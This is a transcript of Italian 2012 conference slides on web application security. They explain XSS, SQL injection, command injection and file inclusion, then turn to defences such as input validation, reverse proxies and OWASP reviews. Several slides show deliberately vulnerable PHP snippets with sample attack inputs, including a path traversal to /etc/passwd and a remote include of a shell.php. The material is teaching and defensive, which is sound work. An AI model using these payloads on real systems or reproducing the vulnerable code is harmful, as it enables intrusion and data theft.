odio le mie applicazioni web e chi le ha scritte
TRANSCRIPT
![Page 1: Odio le mie applicazioni web e chi le ha scritte](https://reader035.vdocuments.pub/reader035/viewer/2022062513/557001aad8b42a84618b504b/html5/thumbnails/1.jpg)
Alessio L.R. [email protected]
Roma, Ottobre 2012
Odio le mie webapp. Ma soprattutto chi le ha scritte!
![Page 2: Odio le mie applicazioni web e chi le ha scritte](https://reader035.vdocuments.pub/reader035/viewer/2022062513/557001aad8b42a84618b504b/html5/thumbnails/2.jpg)
Alessio L.R. Pennasilico
Alessio L.R. Pennasilico
Committed: AIP Associazione Informatici Professionisti, CLUSIT
AIPSI Associazione Italiana Professionisti Sicurezza Informatica
Italian Linux Society, Sikurezza.org, AIP/OPSI
Hacker’s Profiling Project, CrISTAL
2
!
Security Evangelist @
![Page 4: Odio le mie applicazioni web e chi le ha scritte](https://reader035.vdocuments.pub/reader035/viewer/2022062513/557001aad8b42a84618b504b/html5/thumbnails/4.jpg)
Alessio L.R. Pennasilico
Web è bello!
Lavoro ovunque, comunque, a qualsiasi ora, con qualsiasi device, accedendo a tutte le informazioni
che mi servono.
4
![Page 5: Odio le mie applicazioni web e chi le ha scritte](https://reader035.vdocuments.pub/reader035/viewer/2022062513/557001aad8b42a84618b504b/html5/thumbnails/5.jpg)
Alessio L.R. Pennasilico
Dove stava scritto sicurezza? :(
5
![Page 7: Odio le mie applicazioni web e chi le ha scritte](https://reader035.vdocuments.pub/reader035/viewer/2022062513/557001aad8b42a84618b504b/html5/thumbnails/7.jpg)
Alessio L.R. Pennasilico
XSS
Affligge siti web con scarso controllo di variabili derivate da input dell'utente. Permette di inserire codice a livello browser al fine di modificare il codice sorgente della pagina web visitata. In questo modo un cracker può tentare di recuperare dati sensibili quali cookies.
7
![Page 8: Odio le mie applicazioni web e chi le ha scritte](https://reader035.vdocuments.pub/reader035/viewer/2022062513/557001aad8b42a84618b504b/html5/thumbnails/8.jpg)
Alessio L.R. Pennasilico
SQL Injection
Sfrutta la non normalizzazione dell’input
a‘ OR ‘1’=’1
8
![Page 9: Odio le mie applicazioni web e chi le ha scritte](https://reader035.vdocuments.pub/reader035/viewer/2022062513/557001aad8b42a84618b504b/html5/thumbnails/9.jpg)
Alessio L.R. Pennasilico
Funzioni
exec() - system() - eval()
<?phpsystem("echo ".$_REQUEST['parametro']);?>
Se la usassi così?http://host/index.php?parametro=;touch /tmp/hacked
9
![Page 10: Odio le mie applicazioni web e chi le ha scritte](https://reader035.vdocuments.pub/reader035/viewer/2022062513/557001aad8b42a84618b504b/html5/thumbnails/10.jpg)
Alessio L.R. Pennasilico
Local File Inclusion
<?phpinclude('/var/www/articoli/' . $_REQUEST['articolo']);?>
L'utilizzo normale sarebbe:http://host/index.php?articolo=sport.html
ma posso usarlo così:http://host/index.php?articolo=../../../etc/passwd
10
![Page 11: Odio le mie applicazioni web e chi le ha scritte](https://reader035.vdocuments.pub/reader035/viewer/2022062513/557001aad8b42a84618b504b/html5/thumbnails/11.jpg)
Alessio L.R. Pennasilico
Remote File Inclusion
<?php include($_GET['page']);?>
Se la usassi così?http://host/index.php?page=http://xxx/shell.php
11
![Page 12: Odio le mie applicazioni web e chi le ha scritte](https://reader035.vdocuments.pub/reader035/viewer/2022062513/557001aad8b42a84618b504b/html5/thumbnails/12.jpg)
Alessio L.R. Pennasilico
Esempi reali
IIS Webservice
user e pass hardcoded
12
![Page 13: Odio le mie applicazioni web e chi le ha scritte](https://reader035.vdocuments.pub/reader035/viewer/2022062513/557001aad8b42a84618b504b/html5/thumbnails/13.jpg)
Alessio L.R. Pennasilico
Esempi reali
e-commerce
javascript
dati letti dal server ed inviati dal client
prezzi inclusi
13
![Page 14: Odio le mie applicazioni web e chi le ha scritte](https://reader035.vdocuments.pub/reader035/viewer/2022062513/557001aad8b42a84618b504b/html5/thumbnails/14.jpg)
Alessio L.R. Pennasilico
Esempi reali
Quanto sono comodi i tab?
14
![Page 16: Odio le mie applicazioni web e chi le ha scritte](https://reader035.vdocuments.pub/reader035/viewer/2022062513/557001aad8b42a84618b504b/html5/thumbnails/16.jpg)
Alessio L.R. Pennasilico
Filtrare a monte
UTM Firewall
IDS / IPS
DLP
16
![Page 17: Odio le mie applicazioni web e chi le ha scritte](https://reader035.vdocuments.pub/reader035/viewer/2022062513/557001aad8b42a84618b504b/html5/thumbnails/17.jpg)
Alessio L.R. Pennasilico
Software layer
Reverse Proxy
mod_*
17
![Page 18: Odio le mie applicazioni web e chi le ha scritte](https://reader035.vdocuments.pub/reader035/viewer/2022062513/557001aad8b42a84618b504b/html5/thumbnails/18.jpg)
Alessio L.R. Pennasilico
Configurare bene il sistema
chroot
privilege drop
permessi
mod_*
18
![Page 19: Odio le mie applicazioni web e chi le ha scritte](https://reader035.vdocuments.pub/reader035/viewer/2022062513/557001aad8b42a84618b504b/html5/thumbnails/19.jpg)
Alessio L.R. Pennasilico
Scrivere bene le app
input validation
controlli server side
19
![Page 20: Odio le mie applicazioni web e chi le ha scritte](https://reader035.vdocuments.pub/reader035/viewer/2022062513/557001aad8b42a84618b504b/html5/thumbnails/20.jpg)
Alessio L.R. Pennasilico
Standard e check
OWASP - Code review
OSSTMM - PenTest
Repetita iuvant
20
![Page 21: Odio le mie applicazioni web e chi le ha scritte](https://reader035.vdocuments.pub/reader035/viewer/2022062513/557001aad8b42a84618b504b/html5/thumbnails/21.jpg)
Alessio L.R. Pennasilico
Mitigare...
Eliminare le classiche cause di vulnerabilità
es: le password!
21
![Page 22: Odio le mie applicazioni web e chi le ha scritte](https://reader035.vdocuments.pub/reader035/viewer/2022062513/557001aad8b42a84618b504b/html5/thumbnails/22.jpg)
Alessio L.R. Pennasilico
Spiegare
Molti attacchi si possono evitare
con la user awarness
22
![Page 24: Odio le mie applicazioni web e chi le ha scritte](https://reader035.vdocuments.pub/reader035/viewer/2022062513/557001aad8b42a84618b504b/html5/thumbnails/24.jpg)
Alessio L.R. Pennasilico
Conclusioni
Senza scrivere buon codice
tutto il resto è un palliativo!
24
![Page 25: Odio le mie applicazioni web e chi le ha scritte](https://reader035.vdocuments.pub/reader035/viewer/2022062513/557001aad8b42a84618b504b/html5/thumbnails/25.jpg)
Alessio L.R. Pennasilico
Conclusioni
Preoccupatevi delle persone,
più della tecnologia!
25
![Page 26: Odio le mie applicazioni web e chi le ha scritte](https://reader035.vdocuments.pub/reader035/viewer/2022062513/557001aad8b42a84618b504b/html5/thumbnails/26.jpg)
Alessio L.R. [email protected]
Roma, Ottobre 2012
Grazie dell’attenzione! T h e s e s l i d e s a r e
written by Alessio L.R. P e n n a s i l i c o a k a mayhem. They are subjected to Creative Commons Attribution-S h a r e A l i k e - 2 . 5 version; you can copy, modify, or sell them. “Please” ci te your source and use the same licence :)